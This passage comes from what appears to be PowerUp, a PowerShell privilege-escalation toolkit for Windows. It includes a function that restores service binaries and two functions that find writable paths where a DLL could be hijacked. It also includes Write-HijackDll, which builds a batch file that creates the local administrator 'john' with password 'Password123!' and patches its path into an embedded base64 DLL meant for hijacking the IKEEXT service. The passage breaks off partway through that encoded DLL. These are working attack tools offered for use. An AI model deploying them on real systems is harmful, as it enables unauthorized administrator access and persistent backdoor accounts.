(@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-ServiceDetail, Get-ModifiablePath  \n\n.DESCRIPTION\n\nTakes a service Name or a ServiceProcess.ServiceController on the pipeline and\nchecks for the existence of an \"OriginalServiceBinary.exe.bak\" in the service\nbinary location. If it exists, the backup binary is restored to the original\nbinary path.\n\n.PARAMETER Name\n\nThe service name to restore a binary for.\n\n.PARAMETER BackupPath\n\nOptional manual path to the backup binary.\n\n.EXAMPLE\n\nRestore-ServiceBinary -Name VulnSVC\n\nRestore the original binary for the service 'VulnSVC'.\n\n.EXAMPLE\n\nGet-Service VulnSVC | Restore-ServiceBinary\n\nRestore the original binary for the service 'VulnSVC'.\n\n.EXAMPLE\n\nRestore-ServiceBinary -Name VulnSVC -BackupPath 'C:\\temp\\backup.exe'\n\nRestore the original binary for the service 'VulnSVC' from a custom location.\n\n.OUTPUTS\n\nPowerUp.ServiceBinary.Installed\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerUp.ServiceBinary.Restored')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('ServiceName')]\n        [String]\n        [ValidateNotNullOrEmpty()]\n        $Name,\n\n        [Parameter(Position = 1)]\n        [ValidateScript({Test-Path -Path $_ })]\n        [String]\n        $BackupPath\n    )\n\n    PROCESS {\n        $TargetService = Get-Service -Name $Name -ErrorAction Stop\n        $ServiceDetails = $TargetService | Get-ServiceDetail\n        $ModifiableFiles = $ServiceDetails.PathName | Get-ModifiablePath -Literal\n\n        if (-not $ModifiableFiles) {\n            throw \"Service binary '$($ServiceDetails.PathName)' for service $($ServiceDetails.Name) not modifiable by the current user.\"\n        }\n\n        $ServicePath = $ModifiableFiles | Select-Object -First 1 | Select-Object -ExpandProperty ModifiablePath\n        $BackupPath = \"$($ServicePath).bak\"\n\n        Copy-Item -Path $BackupPath -Destination $ServicePath -Force\n        Remove-Item -Path $BackupPath -Force\n\n        $Out = New-Object PSObject\n        $Out | Add-Member Noteproperty 'ServiceName' $ServiceDetails.Name\n        $Out | Add-Member Noteproperty 'ServicePath' $ServicePath\n        $Out | Add-Member Noteproperty 'BackupPath' $BackupPath\n        $Out.PSObject.TypeNames.Insert(0, 'PowerUp.ServiceBinary.Restored')\n        $Out\n    }\n}\n\n\n########################################################\n#\n# DLL Hijacking\n#\n########################################################\n\nfunction Find-ProcessDLLHijack {\n<#\n.SYNOPSIS\n\nFinds all DLL hijack locations for currently running processes.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.DESCRIPTION\n\nEnumerates all currently running processes with Get-Process (or accepts an\ninput process object from Get-Process) and enumerates the loaded modules for each.\nAll loaded module name exists outside of the process binary base path, as those\nare DLL load-order hijack candidates.\n\n.PARAMETER Name\n\nThe name of a process to enumerate for possible DLL path hijack opportunities.\n\n.PARAMETER ExcludeWindows\n\nExclude paths from C:\\Windows\\* instead of just C:\\Windows\\System32\\*\n\n.PARAMETER ExcludeProgramFiles\n\nExclude paths from C:\\Program Files\\* and C:\\Program Files (x86)\\*\n\n.PARAMETER ExcludeOwned\n\nExclude processes the current user owns.\n\n.EXAMPLE\n\nFind-ProcessDLLHijack\n\nFinds possible hijackable DLL locations for all processes.\n\n.EXAMPLE\n\nGet-Process VulnProcess | Find-ProcessDLLHijack\n\nFinds possible hijackable DLL locations for the 'VulnProcess' processes.\n\n.EXAMPLE\n\nFind-ProcessDLLHijack -ExcludeWindows -ExcludeProgramFiles\n\nFinds possible hijackable DLL locations not in C:\\Windows\\* and\nnot in C:\\Program Files\\* or C:\\Program Files (x86)\\*\n\n.EXAMPLE\n\nFind-ProcessDLLHijack -ExcludeOwned\n\nFinds possible hijackable DLL location for processes not owned by the\ncurrent user.\n\n.OUTPUTS\n\nPowerUp.HijackableDLL.Process\n\n.LINK\n\nhttps://www.mandiant.com/blog/malware-persistence-windows-registry/\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerUp.HijackableDLL.Process')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('ProcessName')]\n        [String[]]\n        $Name = $(Get-Process | Select-Object -Expand Name),\n\n        [Switch]\n        $ExcludeWindows,\n\n        [Switch]\n        $ExcludeProgramFiles,\n\n        [Switch]\n        $ExcludeOwned\n    )\n\n    BEGIN {\n        # the known DLL cache to exclude from our findings\n        #   http://blogs.msdn.com/b/larryosterman/archive/2004/07/19/187752.aspx\n        $Keys = (Get-Item \"HKLM:\\System\\CurrentControlSet\\Control\\Session Manager\\KnownDLLs\")\n        $KnownDLLs = $(ForEach ($KeyName in $Keys.GetValueNames()) { $Keys.GetValue($KeyName).tolower() }) | Where-Object { $_.EndsWith(\".dll\") }\n        $KnownDLLPaths = $(ForEach ($name in $Keys.GetValueNames()) { $Keys.GetValue($name).tolower() }) | Where-Object { -not $_.EndsWith(\".dll\") }\n        $KnownDLLs += ForEach ($path in $KnownDLLPaths) { ls -force $path\\*.dll | Select-Object -ExpandProperty Name | ForEach-Object { $_.tolower() }}\n        $CurrentUser = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name\n\n        # get the owners for all processes\n        $Owners = @{}\n        Get-WmiObject -Class win32_process | Where-Object {$_} | ForEach-Object { $Owners[$_.handle] = $_.getowner().user }\n    }\n\n    PROCESS {\n\n        ForEach ($ProcessName in $Name) {\n\n            $TargetProcess = Get-Process -Name $ProcessName\n\n            if ($TargetProcess -and $TargetProcess.Path -and ($TargetProcess.Path -ne '') -and ($Null -ne $TargetProcess.Path)) {\n\n                try {\n                    $BasePath = $TargetProcess.Path | Split-Path -Parent\n                    $LoadedModules = $TargetProcess.Modules\n                    $ProcessOwner = $Owners[$TargetProcess.Id.ToString()]\n\n                    ForEach ($Module in $LoadedModules){\n\n                        $ModulePath = \"$BasePath\\$($Module.ModuleName)\"\n\n                        # if the module path doesn't exist in the process base path folder\n                        if ((-not $ModulePath.Contains('C:\\Windows\\System32')) -and (-not (Test-Path -Path $ModulePath)) -and ($KnownDLLs -NotContains $Module.ModuleName)) {\n\n                            $Exclude = $False\n\n                            if ($PSBoundParameters['ExcludeWindows'] -and $ModulePath.Contains('C:\\Windows')) {\n                                $Exclude = $True\n                            }\n\n                            if ($PSBoundParameters['ExcludeProgramFiles'] -and $ModulePath.Contains('C:\\Program Files')) {\n                                $Exclude = $True\n                            }\n\n                            if ($PSBoundParameters['ExcludeOwned'] -and $CurrentUser.Contains($ProcessOwner)) {\n                                $Exclude = $True\n                            }\n\n                            # output the process name and hijackable path if exclusion wasn't marked\n                            if (-not $Exclude){\n                                $Out = New-Object PSObject\n                                $Out | Add-Member Noteproperty 'ProcessName' $TargetProcess.ProcessName\n                                $Out | Add-Member Noteproperty 'ProcessPath' $TargetProcess.Path\n                                $Out | Add-Member Noteproperty 'ProcessOwner' $ProcessOwner\n                                $Out | Add-Member Noteproperty 'ProcessHijackableDLL' $ModulePath\n                                $Out.PSObject.TypeNames.Insert(0, 'PowerUp.HijackableDLL.Process')\n                                $Out\n                            }\n                        }\n                    }\n                }\n                catch {\n                    Write-Verbose \"Error: $_\"\n                }\n            }\n        }\n    }\n}\n\n\nfunction Find-PathDLLHijack {\n<#\n.SYNOPSIS\n\nFinds all directories in the system %PATH% that are modifiable by the current user.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-ModifiablePath  \n\n.DESCRIPTION\n\nEnumerates the paths stored in Env:Path (%PATH) and filters each through Get-ModifiablePath\nto return the folder paths the current user can write to. On Windows 7, if wlbsctrl.dll is\nwritten to one of these paths, execution for the IKEEXT can be hijacked due to DLL search\norder loading.\n\n.EXAMPLE\n\nFind-PathDLLHijack\n\nFinds all %PATH% .DLL hijacking opportunities.\n\n.OUTPUTS\n\nPowerUp.HijackableDLL.Path\n\n.LINK\n\nhttp://www.greyhathacker.net/?p=738\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerUp.HijackableDLL.Path')]\n    [CmdletBinding()]\n    Param()\n\n    # use -Literal so the spaces in %PATH% folders are not tokenized\n    Get-Item Env:Path | Select-Object -ExpandProperty Value | ForEach-Object { $_.split(';') } | Where-Object {$_ -and ($_ -ne '')} | ForEach-Object {\n        $TargetPath = $_\n        $ModifidablePaths = $TargetPath | Get-ModifiablePath -Literal | Where-Object {$_ -and ($Null -ne $_) -and ($Null -ne $_.ModifiablePath) -and ($_.ModifiablePath.Trim() -ne '')}\n        ForEach ($ModifidablePath in $ModifidablePaths) {\n            if ($Null -ne $ModifidablePath.ModifiablePath) {\n                $ModifidablePath | Add-Member Noteproperty '%PATH%' $_\n                $ModifidablePath | Add-Member Aliasproperty Name '%PATH%'\n                $ModifidablePath.PSObject.TypeNames.Insert(0, 'PowerUp.HijackableDLL.Path')\n                $ModifidablePath\n            }\n        }\n    }\n}\n\n\nfunction Write-HijackDll {\n<#\n.SYNOPSIS\n\nPatches in the path to a specified .bat (containing the specified command) into a\npre-compiled hijackable C++ DLL writes the DLL out to the specified ServicePath location.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.DESCRIPTION\n\nFirst builds a self-deleting .bat file that executes the specified -Command or local user,\nto add and writes the.bat out to -BatPath. The BatPath is then patched into a pre-compiled\nC++ DLL that is built to be hijackable by the IKEEXT service. There are two DLLs, one for\nx86 and one for x64, and both are contained as base64-encoded strings. The DLL is then\nwritten out to the specified OutputFile.\n\n.PARAMETER DllPath\n\nFile name to write the generated DLL out to.\n\n.PARAMETER Architecture\n\nThe Architecture to generate for the DLL, x86 or x64. If not specified, PowerUp\nwill try to automatically determine the correct architecture.\n\n.PARAMETER BatPath\n\nPath to the .bat for the DLL to launch.\n\n.PARAMETER UserName\n\nThe [domain\\]username to add. If not given, it defaults to \"john\".\nDomain users are not created, only added to the specified localgroup.\n\n.PARAMETER Password\n\nThe password to set for the added user. If not given, it defaults to \"Password123!\"\n\n.PARAMETER LocalGroup\n\nLocal group name to add the user to (default of 'Administrators').\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object specifying the user/password to add.\n\n.PARAMETER Command\n\nCustom command to execute instead of user creation.\n\n.OUTPUTS\n\nPowerUp.HijackableDLL\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingUserNameAndPassWordParams', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')]\n    [OutputType('PowerUp.HijackableDLL')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $True)]\n        [String]\n        [ValidateNotNullOrEmpty()]\n        $DllPath,\n\n        [String]\n        [ValidateSet('x86', 'x64')]\n        $Architecture,\n\n        [String]\n        [ValidateNotNullOrEmpty()]\n        $BatPath,\n\n        [String]\n        $UserName = 'john',\n\n        [String]\n        $Password = 'Password123!',\n\n        [String]\n        $LocalGroup = 'Administrators',\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [String]\n        [ValidateNotNullOrEmpty()]\n        $Command\n    )\n\n    function local:Invoke-PatchDll {\n    <#\n    .SYNOPSIS\n\n    Helpers that patches a string in a binary byte array.\n\n    .PARAMETER DllBytes\n\n    The binary blob to patch.\n\n    .PARAMETER SearchString\n\n    The string to replace in the blob.\n\n    .PARAMETER ReplaceString\n\n    The string to replace SearchString with.\n    #>\n\n        [OutputType('System.Byte[]')]\n        [CmdletBinding()]\n        Param(\n            [Parameter(Mandatory = $True)]\n            [Byte[]]\n            $DllBytes,\n\n            [Parameter(Mandatory = $True)]\n            [String]\n            $SearchString,\n\n            [Parameter(Mandatory = $True)]\n            [String]\n            $ReplaceString\n        )\n\n        $ReplaceStringBytes = ([System.Text.Encoding]::UTF8).GetBytes($ReplaceString)\n\n        $Index = 0\n        $S = [System.Text.Encoding]::ASCII.GetString($DllBytes)\n        $Index = $S.IndexOf($SearchString)\n\n        if ($Index -eq 0) {\n            throw(\"Could not find string $SearchString !\")\n        }\n\n        for ($i=0; $i -lt $ReplaceStringBytes.Length; $i++) {\n            $DllBytes[$Index+$i]=$ReplaceStringBytes[$i]\n        }\n\n        return $DllBytes\n    }\n\n    if ($PSBoundParameters['Command']) {\n        $BatCommand = $Command\n    }\n    else {\n        if ($PSBoundParameters['Credential']) {\n            $UserNameToAdd = $Credential.UserName\n            $PasswordToAdd = $Credential.GetNetworkCredential().Password\n        }\n        else {\n            $UserNameToAdd = $UserName\n            $PasswordToAdd = $Password\n        }\n\n        if ($UserNameToAdd.Contains('\\')) {\n            # only adding a domain user to the local group, no user creation\n            $BatCommand = \"net localgroup $LocalGroup $UserNameToAdd /add\"\n        }\n        else {\n            # create a local user and add it to the local specified group\n            $BatCommand = \"net user $UserNameToAdd $PasswordToAdd /add && timeout /t 5 && net localgroup $LocalGroup $UserNameToAdd /add\"\n        }\n    }\n\n    # generate with base64 -w 0 hijack32.dll > hijack32.b64\n    $DllBytes32 = \"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